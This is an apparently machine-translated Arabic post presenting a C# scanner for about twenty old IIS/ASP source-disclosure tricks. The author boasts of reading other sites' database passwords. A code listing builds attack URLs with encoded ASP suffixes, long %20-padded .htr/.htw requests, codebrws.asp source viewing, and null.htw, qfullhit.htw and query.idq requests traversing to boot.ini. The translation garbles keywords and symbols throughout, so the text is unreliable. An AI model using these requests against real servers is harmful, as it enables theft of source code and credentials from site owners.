كما نعلم جميعًا ، يحتوي منصة Windows على العديد من الثغرات ، والبقع هي واحدة تلو الأخرى ، لكنها لا تكفي دائمًا للتعويض عنها. لقد لخصت 20 طريقة أعرفها عن الرمز المصدر ASP ، وكتبت تطبيقًا في C# لمسح نقاط الضعف هذه. ولكن في اليومين الماضيين ، رأيت حقًا الكود المصدر للعديد من مواقع الويب ، بما في ذلك كلمات مرور قاعدة البيانات. إلى قاعدة البيانات وافعل ما تريد. أولاً ، اذكر هذه الطرق العشرين أدناه:
| . ٪ 81 ::بيانات ٪ 2e ٪ 2e ٪ 41SP +. هتر // Longhtr . باك CodeBrws.asp عرض الرمز null.htw qfullhit.htw Qsumrhit.htw query.idq البحث/qfullhit.htw البحث/qsumrhit.htw iirturnh.htw .htw ترجمة: f |
تتم إضافة 10 من نقاط الضعف المذكورة أعلاه مباشرة إلى ملف ASP ، مثل ٪ 81 هو xxx.asp ٪ 81. : لا تتوفر طريقة F من خلال المتصفح قم بتنزيل كل شيء من موقعي.
| التبديل (this.cbomethod.selectedIndex) { الحالة 0: // اقرأ مباشرة strrequestfile = strserver + strurl ؛ استراحة؛ الحالة 5: // ٪ 2e ٪ 41SP strrequestfile = strserver + strprath + strfirst + ٪ 2e ٪ 41SP ؛ استراحة؛ الحالة 8: // longhtr strrequestfile = strserver + strurl + + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ + 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ + 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ .HTR ؛ استراحة؛ الحالة 10: //codebrws.asp strequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp؟source= + strurl ؛ استراحة؛ الحالة 11: //showcode.asp strequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp؟source= + /msadc/../../../boot.ini ؛ استراحة؛ الحالة 12: //null.htw strrequestfile = strserver + /null.htw؟ciwebhitsfile= + strurl + ٪ 20 & hirestriction = none & cihiliteType = full ؛ استراحة؛ الحالة 13: //qfullhit.htw strequestfile = strserver + /iissamples/issamples/oop/qfullhit.htw؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ الحالة 14: //qsumrhit.htw strequestfile = strserver + /iissamples/issamples/oop/qsumrhit.htw؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ الحالة 15: //query.idq strequestfile = strserver + /query.idq؟citemplate=/../../boot.ini + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ + 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ .htx ؛ استراحة؛ الحالة 16: //search/qfullhit.htw strequestfile = strserver + /iissamples/exair/search/qfullhit.htw؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ الحالة 17: // search/qsumrhit.htw strequestfile = strserver + /iissamples/exair/search/qsumrhit.htw؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ الحالة 18: //iirturnh.htw strequestfile = strserver + /iishelp/iis/misc/iirturnh.htw؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ الحالة 19: //.htw strrequestfile = strserver + strurl + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ + 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 + ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ 20 ٪ .HTW؟ + ciwebhitsfile =/../../boot.ini & hirestriction = لا شيء + & cihiliteType = full ؛ استراحة؛ تقصير: strrequestfile = strserver + strurl + this.cbomethod.text ؛ } |